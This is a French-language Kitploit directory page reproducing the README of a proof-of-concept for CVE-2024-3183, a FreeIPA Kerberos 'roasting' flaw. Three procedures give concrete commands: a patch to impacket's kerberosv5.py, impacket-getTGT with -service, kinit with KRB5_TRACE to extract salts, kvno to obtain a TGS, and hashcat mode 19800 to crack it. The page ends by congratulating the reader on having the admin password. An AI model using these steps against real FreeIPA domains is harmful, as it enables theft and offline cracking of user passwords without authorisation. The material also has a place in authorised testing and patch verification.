Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3183-POC — POC for CVE-2024-3183 (FreeIPA Rosting) | Kitploit
Outils/GitHubGitHub/im10n/cve-2024-3183-poc
Password AttacksVulnerability AnalysisExploitationPenetration TestingAuthentication
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

POC for CVE-2024-3183 (FreeIPA Rosting)

Voir le dépôt
292il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-3183-POC

PoC pour CVE-2024-3183 (FreeIPA Rosting)

Impact : Un utilisateur avec des privilèges faibles peut obtenir un hash des mots de passe de tous les utilisateurs du domaine et effectuer une attaque par force brute hors ligne (kerberoasting).

Correctif pour impacket-getTGT :

  1. Ajoutez decoder.decode.defaultErrorState = stGetValueDecoderByTag à impacket/krb5/kerberosv5.py.
  2. Profitez !

POC1:

  1. Ajoutez decoder.decode.defaultErrorState = stGetValueDecoderByTag à impacket/krb5/kerberosv5.py.
  2. Vous pouvez utiliser impacket-getTGT avec l'option -service et l'option -debug pour obtenir le sel en une seule commande. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. Tout d'abord, demandons un ticket TGT pour un utilisateur déjà compromis "admin". kinit user foto1
  2. Ensuite, nous allons découvrir le sel de l'utilisateur "admin" : printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. Obtenez un TGS pour "admin" : kvno admin foto foto3
  4. Utilisez un script Python (ou hashcat mod 19800 avec un sel spécifique) pour faire une attaque par force brute sur le TGS. foto4

1 - TGS, 2 - SALT, 3 - Mots de passe.

  1. Félicitations, nous avons maintenant le mot de passe de l'utilisateur "admin".

POC3:

  1. Vous pouvez utiliser kinit en une seule étape : kinit -S target user

et vous obtenez un TGT qui est chiffré avec la clé de l'utilisateur cible.

Télécharger l’outil